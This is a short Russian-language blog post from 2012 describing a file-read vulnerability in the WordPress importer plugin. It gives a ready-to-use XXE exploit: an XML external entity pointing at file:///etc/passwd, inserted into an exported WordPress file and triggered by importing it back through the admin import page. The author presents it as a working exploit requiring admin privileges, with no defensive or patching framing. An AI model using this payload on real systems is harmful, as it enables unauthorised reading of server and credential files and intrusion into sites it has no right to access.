Уязвимость плагина wordpress-importer Опишу все коротко, но ясно. Для начала экспортируем хотя бы одну запись. Это делается тут: Code: http://127.0.0.1/wordpress/wp-admin/export.php Дальше открываем этот файл и вставляем следующее: Code: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE leak [ <!ELEMENT leak (#PCDATA)> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <rss version="2.0"....... Теперь в переменной xxe у нас будет содержание файла /etc/passwd. Чтобы вывести этот параметр, мы можем вставить его куда угодно, например: Code: .... <content:encoded>&xxe;</content:encoded> ..... Вот у нас получился готовый эксплойт. Теперь импортируем его обратно тут - Code: http://127.0.0.1/wordpress/wp-admin/admin.php?import=wordpress Если у вас все прекрасно и без ошибок импортировалось, это хорошо! Наблюдаем например работу нашего эксплойта: Привилегии: admin Тип уязвимости: Читалка файлов Автор: cyber-punk Запись от 20.05.2012 http://0x0000ed.com/?p=26 http://0x0000ed.com/